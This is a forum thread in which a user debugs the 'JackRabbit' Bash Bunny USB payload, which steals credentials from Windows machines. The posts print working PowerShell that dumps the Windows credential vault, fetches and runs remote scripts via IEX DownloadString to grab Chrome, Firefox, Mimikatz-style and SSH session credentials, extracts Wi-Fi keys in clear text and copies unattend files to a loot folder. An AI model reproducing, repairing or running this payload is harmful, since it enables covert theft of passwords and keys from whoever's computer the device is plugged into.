JackRabbit payload

[TeCHemically]

Has anyone had any success with the jackrabbit payload? It seems to be exactly what I'm looking for; except it's not working at all. It creates the sub-folder for the target in the loot directory; but it doesn't put any data in the folder. Also, it leaves many of its powershell windows open with all of the bashbunny code just sitting there out in the open. It doesn't eject properly either. So, it's not closing its windows, writing any of the target info to the loot folder, or ejecting properly. 

[TeCHemically]

Here is the output of the first action/terminal window:

PS C:\Users\profile> $Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | S
elect-Object -ExpandProperty DriveLetter)
PS C:\Users\profile> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computerna
me)-$($env:username)"
PS C:\Users\profile> md $LOOTDIR2

    Directory: E:\loot\JackRabbit

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         11/1/2017  10:09 PM           TESTMACHINE-PC-profile

PS C:\Users\profile> $ClassHolder = [Windows.Security.Credentials.PasswordVau
lt,Windows.Security.Credentials,ContentType=WindowsRuntime];$VaultObj = new-obje
ct Windows.Security.Credentials.PasswordVault; $VaultObj.RetrieveAll() |foreach
{ $_.RetrievePassword(); $_ } |
>> IEX (New-Object Net.WebClient).DownloadString('http://site.url/chrome.ps1
\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt

 

I am now hosting the ps1 scripts myself, so the URLs are different than the original payload; however, this was failing from the beginning in the exact same manner. I only began hosting them myself once I started working on the script due to its failures.

 

Here is the output from the 2nd step/powershell terminal:

PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> $Bunny = (gwmi win32_volume -f 'l
abel=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)
PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> $LOOTDIR2 = "$($Bunny)\loot\JackR
abbit\$($env:computername)-$($env:username)"
PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> IEX (New-Object Net.WebClient).Do
wnloadString('http://site.url/fox.ps1\)\; Get-FoxDump \| Out-File \$LOOTDIR2
\\FireFox.txt
>> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computername)-$($env:username)"

>> IEX (New-Object Net.WebClient).DownloadString('http://site.url/mimidogz.p
s1\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt(ne
tsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.G
roups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)}
 | Select-String "Key Content\W+\:(.+)$" |%{$pass=$_.Matches | % {$_.Groups[1].V
alue.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} |
>> IEX (New-Object Net.WebClient).DownloadString('http://site.url/ssh.ps1\)\
; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt$F = @();$
F += "C:\sysprep.inf";$F += "C:\sysprep\sysprep.xml";$F += "C:\WINDOWS\panther\U
nattend\Unattended.xml";$F += "C:\WINDOWS\panther\Unattended.xml";$i = 0; foreac
h($file in $F) {if (Test-Path $file){cp $file $LOOTDIR2;$i++}}
>> Out-File -FilePath $BUNNY\loot\DONE
>> $Eject = New-Object -comObject Shell.Application
>> $Eject.NameSpace(17).ParseName($Bunny).InvokeVerb("Eject")
>> EXIT
>>
 

I noticed the double ">>" that are in the terminal now. Is this a result of what is causing these actions to fail? Is there something not escaped out or that is escaped out when it shouldn't be? Also, what is the easiest way to host these ps1 scripts on the bunny in the switch folder and call them locally instead of needing to reach out to the internet?

[TeCHemically]

So, going through the script the following part is not entered into the first powershell window:

Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
Q ENTER
Q DELAY 1000

# Jackin' Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.url/BrowserGather.ps1\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
Q ENTER
Q DELAY 1000

Q STRING exit
Q ENTER

 

This is why the first window stays open and no browser creds are written to the loot folder. I have no idea why this section is failing like this though. There doesn't seem to be any reason that this section is not injected like the rest.

[TeCHemically]

This entire section is missing from the 2nd failed window, which explains the mimikatz/dogz failure:

# Jackin' Windows creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.rul/md.ps1\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
Q DELAY 1000
Q ENTER

These lines are also missing in the powershell window output; which explains why there are no wifi creds, ssh keys, etc, in the loot folder:

Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
Q ENTER
Q DELAY 1000

# Jackin' SSH Creds
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.url/SessionGopher.ps1\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
Q ENTER
Q DELAY 1000

I have no clue why these lines aren't being entered into the window. They appear to be written properly just like the lines above and below them. Thanks to any who respond!

[TeCHemically]

Looking at the WiFi cred grabber specifically this line is throwing an error at character 383:

\(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\}  \| Select-String \""Key Content\\W+\\:(.+)\$\"" \| \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\ ;PASSWORD\=\$pass \}\} \| Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt

Character 383 is the ";" right before "PASSWORD" on the last line toward the end. Here is the error:

Unexpected token '\=\$name\' in expression or statement.
At line:1 char:383
+ \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Valu
e.Trim\(\)\}\; \$_\} \| \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\}  \| Select-String \""Key Conten
t\\W+\\:(.+)\$\"" \| \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]
@\{ "PROFILE_NAME"\=\$name\ <<<<  ;PASSWORD\=\$pass \}\} \| Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
    + CategoryInfo          : ParserError: (\=\$name\:String) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken

 

Can someone explain what is going wrong here? Thanks for any help you can provide!

[TeCHemically]

Any of the escaped out powershell commands that are broken up into separate lines with a | at the end will cause an error. I am not sure why; but the do. For the wifi cred jacking section, for instance, the last line with a | at the end causes a stop. If you add that line to the line above, then then preceding line's | is where the break happens. To resolve this anomaly I moved all the | characters to the beginning of each line. This allows the script to run through; however, the creds are not being saved to the loot folder. I am not sure why as of yet.

[TeCHemically]

So, any powershell commands that end in a .txt are failing it looks like. firmware 1.4 may resolve this; that is the main problem. Also, any powershell command that is broken up in multiple lines with a pipe at the end od the line is causing an error in parsing and injecting. It looks like version 1.4 may resolve this as well. However, now that my commands are running, i still get no files written to the USB loot folder. I've no idea why this is failing. PasswordGrabber works in writing txt files to the loot folder; but no other payload seems to be able to. Tried basically every credential payload and blackbackup as well. It appears to run; but i get nothing written to the USB part. The only thing the bashbunny had going for it was the ability to write to a local USB partition for exfil and cred dump; and that is effectively broken.